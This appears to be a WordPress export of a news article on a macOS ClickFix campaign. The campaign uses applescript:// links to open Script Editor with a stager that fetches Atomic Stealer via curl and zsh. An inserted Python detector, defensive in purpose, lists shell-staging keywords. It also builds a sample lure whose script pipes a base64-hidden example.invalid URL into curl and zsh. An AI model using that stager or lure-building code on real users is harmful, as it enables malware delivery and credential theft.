{"id":7762,"date":"2026-04-09T11:51:29","date_gmt":"2026-04-09T11:51:29","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=7762"},"modified":"2026-04-09T11:51:29","modified_gmt":"2026-04-09T11:51:29","slug":"new-clickfix-variant-bypasses-apple-safeguards-with-one%e2%80%91click-script-execution","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=7762","title":{"rendered":"New ClickFix variant bypasses Apple safeguards with one\u2011click script execution"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<p>ClickFix malware campaigns are evolving again, with threat actors removing one of their most obvious and user\u2011dependent steps: convincing victims to paste malicious commands into Terminal. Instead, the latest variant uses a single browser click to trigger script execution, streamlining the infection chain and reducing user hesitation.<\/p>\n<p>Researchers at Jamf Threat Labs have identified a new macOS campaign that launches Apple\u2019s native Script Editor directly from the browser, preloaded with malicious code. The technique abuses the applescript:\/\/ URL scheme to open Script Editor automatically, sidestepping Terminal entirely and delivering Atomic Stealer payloads with far less friction.<\/p>\n<p>\u201cScript Editor has a well-documented history as a malware delivery mechanism, so its presence here isn\u2019t surprising,\u201d the researchers said in a blog <a href=\"https:\/\/www.jamf.com\/blog\/clickfix-macos-script-editor-atomic-stealer\/\" target=\"_blank\" rel=\"noopener\">post<\/a>. \u201cWhat is notable is its role in this ClickFix campaign and the fact that it was invoked via a URL scheme.\u201d<\/p>\n<p>The payload isn\u2019t new. 
It\u2019s Atomic Stealer, a credential-harvesting strain commonly deployed in macOS-focused campaigns.<\/p>\n<h2 class=\"wp-block-heading\">Apple adds a protection, attackers go around it<\/h2>\n<p>Previously, <a href=\"https:\/\/www.csoonline.com\/article\/4016208\/sixfold-surge-of-clickfix-attacks-threatens-corporate-defenses.html\">ClickFix<\/a> chains relied on social engineering to get users to paste obfuscated commands into Terminal. Apple\u2019s <a href=\"https:\/\/x.com\/ClassicII_MrMac\/status\/2036797948911141129?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E2036797948911141129%7Ctwgr%5Ee38184a3ae3653520299266b2cf56d000e3837e6%7Ctwcon%5Es1_&amp;ref_url=https%3A%2F%2F9to5mac.com%2F2026%2F03%2F25%2Fmacos-26-4-has-new-terminal-popup-warning-when-pasting-commands%2F\" target=\"_blank\" rel=\"noopener\">recent<\/a> protections added scanning of commands pasted into Terminal and a warning prompt before they run, putting friction into exactly that step.<\/p>\n<p>This campaign routes around it.<\/p>\n<p>Victims are directed to an Apple-themed page posing as a system fix or cleanup guide. Instead of copying anything, they click a button that invokes an applescript:\/\/ URL. That click opens Script Editor with a pre-populated script, ready to run.<\/p>\n<p>By keeping the user out of Terminal altogether, the attacker removes the decision point Apple introduced in macOS Tahoe 26.4. \u201cApple took direct aim at this in macOS 26.4, introducing a security feature that scans commands pasted into Terminal before they\u2019re executed,\u201d the researchers added. \u201cIt\u2019s a meaningful friction point, but as this campaign illustrates, when one door closes, attackers find another.\u201d<\/p>\n<p>Script Editor is a native macOS utility and, for less experienced users, does not carry the same immediate suspicion as Terminal. 
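<\/p>
<p>The following Python is an added example, not code from Jamf Threat Labs and not an artefact of the campaign. It triages a web page for applescript:\/\/ links of the kind the lure uses, recovers the script that Script Editor would be handed, and flags the shell-staging indicators (a \u2018do shell script\u2019 wrapper, base64, curl, zsh) that the staging chain described in the next section would show, decoding any base64 run to surface a hidden URL. It assumes the documented Script Editor URL form applescript:\/\/com.apple.scripteditor?action=new&amp;script=&lt;percent-encoded script&gt;; the domain example.invalid, the script text and the indicator list are constructed for illustration, not observed indicators.<\/p>

```python
"""Triage a web page for applescript:// links that preload Script Editor.

Added example for this article; it is not Jamf Threat Labs' code and not a
campaign artefact. Assumption: Script Editor's documented URL form is
    applescript://com.apple.scripteditor?action=new&script=<percent-encoded script>
The sample page, domain (example.invalid), script text and indicator list
below are constructed for illustration.
"""
import base64
import html
import re
from urllib.parse import parse_qs, quote, urlsplit

# Words that betray a shell stager rather than an ordinary AppleScript.
# Constructed heuristic list, not an observed IOC set.
STAGING_INDICATORS = ("do shell script", "curl", "zsh", "base64", "xattr", "chmod", "/tmp")

APPLESCRIPT_URL = re.compile(r"applescript://[^\s\"'<>]+")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_IN_TEXT = re.compile(r"https?://[^\s\"'|;&]+")


def extract_applescript_urls(page: str) -> list[str]:
    """Return every applescript:// URL on the page, whether it sits in an href,
    an onclick handler or inline JavaScript. Entities are unescaped first so
    an '&amp;' in an attribute does not hide the query string."""
    return APPLESCRIPT_URL.findall(html.unescape(page))


def script_from_url(url: str) -> str:
    """Recover the AppleScript Script Editor would open for this URL; other
    schemes yield an empty string. parse_qs percent-decodes the script."""
    parts = urlsplit(url)
    if parts.scheme != "applescript":
        return ""
    return parse_qs(parts.query).get("script", [""])[0]


def hidden_urls(script: str) -> list[str]:
    """Decode base64-looking runs in the script and return any URL they
    conceal (the stager described in the article decodes a hidden URL
    before handing it to curl). Non-base64 runs are skipped silently."""
    found = []
    for blob in B64_BLOB.findall(script):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError
            continue
        found.extend(URL_IN_TEXT.findall(text))
    return found


def triage_page(page: str) -> list[dict]:
    """One finding per applescript:// link: the decoded script, which
    staging indicators it contains, any hidden URLs, and a verdict."""
    findings = []
    for url in extract_applescript_urls(page):
        script = script_from_url(url)
        lowered = script.lower()
        hits = [word for word in STAGING_INDICATORS if word in lowered]
        urls = hidden_urls(script)
        findings.append({
            "url": url,
            "script": script,
            "indicators": hits,
            "hidden_urls": urls,
            "verdict": "staging" if (hits or urls) else "benign",
        })
    return findings


def lure_link(script: str) -> str:
    """Build the link a lure page would carry (assumed Script Editor URL form)."""
    return "applescript://com.apple.scripteditor?action=new&script=" + quote(script, safe="")


def sample_page() -> str:
    """Constructed lure page: a 'Fix now' button carrying a curl|zsh stager
    with a base64-hidden URL, plus one harmless link for contrast."""
    hidden = base64.b64encode(b"https://example.invalid/p.sh").decode()
    stager = 'do shell script "echo ' + hidden + ' | base64 -d | xargs curl -fsSL | zsh"'
    benign = 'display dialog "Hello"'
    parts = [
        "<h1>macOS needs a quick repair</h1>",
        '<a href="' + lure_link(stager) + '">Fix now</a>',
        "<button onclick=\"location.href='" + lure_link(benign) + "'\">Say hello</button>",
    ]
    return "".join(parts)


if __name__ == "__main__":
    for finding in triage_page(sample_page()):
        print(finding["verdict"], finding["indicators"], finding["hidden_urls"])
```

<p>Run as a script it prints one verdict per link; triage_page() returns the findings as data so the same logic can sit behind a proxy or mail-gateway hook. Because parse_qs percent-decodes the script parameter, the indicator match sees the text Script Editor would see rather than the encoded URL, which a naive substring search for \u2018curl\u2019 over the raw page would miss.<\/p>
<p>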
Even so, the technique still meets some friction that was not built with it in mind.<\/p>\n<p>The researchers pointed out that Script Editor\u2019s behavior varies with the macOS version. \u201cOn recent versions of macOS Tahoe, an additional warning prompt is presented, requiring the user to allow the script to be saved to disk before execution,\u201d they said.<\/p>\n<h2 class=\"wp-block-heading\">Lightweight staging for Atomic Stealer<\/h2>\n<p>Once executed, the AppleScript resolves to an obfuscated shell command. That command decodes a hidden URL, retrieves a remote payload with \u2018curl\u2019 and runs it through \u2018zsh\u2019. From there the chain is the familiar one: a Mach-O binary is written to a temporary location, its file attributes are adjusted, its permissions are set, and it is executed.<\/p>\n<p>This binary is a new variant of the <a href=\"https:\/\/www.csoonline.com\/article\/3617624\/is-the-tide-turning-on-macos-security.html\">Atomic Stealer<\/a>.<\/p>\n<p>The researchers noted that this staging keeps the initial script minimal and less detectable, while the actual malicious logic arrives separately: the chain is modular, quick to update, and harder to catch at the first stage.<\/p>\n<p>Atomic Stealer\u2019s objectives are <a href=\"https:\/\/www.csoonline.com\/article\/4062342\/macs-go-phishing-as-github-impostors-drop-atomic-stealer.html\">consistent<\/a> with earlier macOS infostealer campaigns, which focused on harvesting browser credentials, saved passwords, crypto wallet data, and developer artifacts. 
Previous <a href=\"https:\/\/www.csoonline.com\/article\/1308864\/hackers-using-stolen-credentials-to-launch-attacks-as-info-stealing-peaks.html\">reporting<\/a> has shown that such stealers rarely operate in isolation, as exfiltrated data is almost always funneled into credential reuse attacks and account takeovers.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>ClickFix malware campaigns are evolving again, with threat actors removing one of their most obvious and user\u2011dependent steps: convincing victims to paste malicious commands into Terminal. Instead, the latest variant uses a single browser click to trigger script execution, streamlining the infection chain and reducing user hesitation. Researchers at Jamf Threat Labs have identified a [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":7763,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-7762","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7762"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7762"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7762\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/7763"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7762"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7762"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7762"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}